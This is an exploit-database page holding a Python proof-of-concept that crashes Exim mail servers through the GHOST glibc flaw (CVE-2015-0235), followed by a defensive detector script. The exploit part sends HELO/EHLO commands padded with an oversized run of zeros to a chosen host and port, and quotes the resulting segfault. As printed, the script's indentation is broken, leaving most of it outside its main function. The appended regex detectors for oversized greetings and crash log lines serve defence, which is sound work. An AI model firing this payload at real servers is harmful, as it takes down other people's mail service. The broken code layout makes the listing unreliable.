Exim ESMTP GHOST Denial Of Service

Published: 29 Jan 2015 | Reported by: Packet Storm | Type: packetstorm | Source: packetstormsecurity.com

PoC exploit script for GHOST vulnerability in Exim SMTP causing denial of service crash.

`The below script is a PoC exploit for the GHOST vulnerability affecting Exim SMTP servers resulting in a service crash.  
  
#!/usr/bin/python  
# Exim ESMTP DoS Exploit by 1N3 v20150128  
# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow  
# http://crowdshield.com  
#  
# USAGE: python ghost-smtp-dos.py <ip> <port>  
#  
# Escape character is '^]'.  
# 220 debian-7-7-64b ESMTP Exim 4.80 ...  
# HELO  
# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  
# Connection closed by foreign host.  
#  
# user () debian-7-7-64b:~$ dmesg  
# ...  
# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in  
# libc-2.13.so[7fabef2a2000+182000]  
  
import socket  
import time  
import sys, getopt  
  
def main(argv):
    argc = len(argv)

    # Both <ip> and <port> are required (see USAGE above)
    if argc <= 2:
        print "usage: %s <host> <port>" % (argv[0])
        sys.exit(0)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"  
  
target = argv[1] # SET TARGET  
port = argv[2] # SET PORT  
  
print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"  
print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer))  
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
connect=s.connect((target,int(port)))  
data = s.recv(1024)  
print "CONNECTION: " +data  
s.send('HELO ' + buffer + '\r\n')  
data = s.recv(1024)  
print "received: " +data  
s.send('EHLO ' + buffer + '\r\n')  
data = s.recv(1024)  
print "received: " +data  
s.close()  
  
main(sys.argv)  
`
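
A detection-side counterpart to the PoC above, added here as an example and not part of the original Packet Storm script: it flags HELO/EHLO arguments longer than the 255-octet domain limit of RFC 5321, marks the digits-and-dots-only form that reaches the vulnerable glibc `gethostbyname` path, and matches the kernel segfault line quoted in the PoC header. The function names, the constructed sample session and the 1200-character sample length are assumptions made for illustration.

```python
import re

MAX_DOMAIN_OCTETS = 255  # RFC 5321 upper bound for a domain name
HELO_RE = re.compile(rb"^(HELO|EHLO)[ \t]+(\S*)\s*$", re.IGNORECASE)
DIGITS_DOTS_RE = re.compile(rb"^[0-9][0-9.]*$")
SEGFAULT_RE = re.compile(
    r"\b(exim4?)\[(\d+)\]: segfault at .* in\s+(libc-[\w.]+\.so)")

# Constructed sample SMTP client lines (not captured traffic).
SAMPLE_SESSION = [
    b"EHLO mail.example.org\r\n",
    b"HELO " + b"0" * 1200 + b"\r\n",
    b"EHLO " + b"a" * 300 + b"\r\n",
    b"MAIL FROM:<a@example.org>\r\n",
]
# The dmesg line from the PoC header comment, rejoined onto one line.
SAMPLE_KLOG = ("[ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 "
               "ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in "
               "libc-2.13.so[7fabef2a2000+182000]")


def classify_helo(line):
    """Return (verb, arg_len, verdict) for a HELO/EHLO line, else None."""
    m = HELO_RE.match(line.rstrip(b"\r\n"))
    if not m:
        return None
    verb, arg = m.group(1).upper().decode(), m.group(2)
    if len(arg) <= MAX_DOMAIN_OCTETS:
        verdict = "ok"
    elif DIGITS_DOTS_RE.match(arg):
        verdict = "ghost-pattern"  # oversized and digits/dots only
    else:
        verdict = "oversized"
    return verb, len(arg), verdict


def scan_session(lines):
    """Return the classify_helo() results whose verdict is not 'ok'."""
    results = (classify_helo(line) for line in lines)
    return [r for r in results if r and r[2] != "ok"]


def find_libc_segfaults(kernel_log):
    """Return (process, pid, library) for each exim segfault inside libc."""
    hits = map(SEGFAULT_RE.search, kernel_log.splitlines())
    return [m.groups() for m in hits if m]


if __name__ == "__main__":
    print("suspicious greetings:", scan_session(SAMPLE_SESSION))
    print("crash evidence:", find_libc_segfaults(SAMPLE_KLOG))
```

A greeting flagged here together with a matching segfault line on the same host is a strong signal that the mail server is still linked against an unpatched glibc.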

Vulners AI Score: 7.6 (High risk) | EPSS: 0.974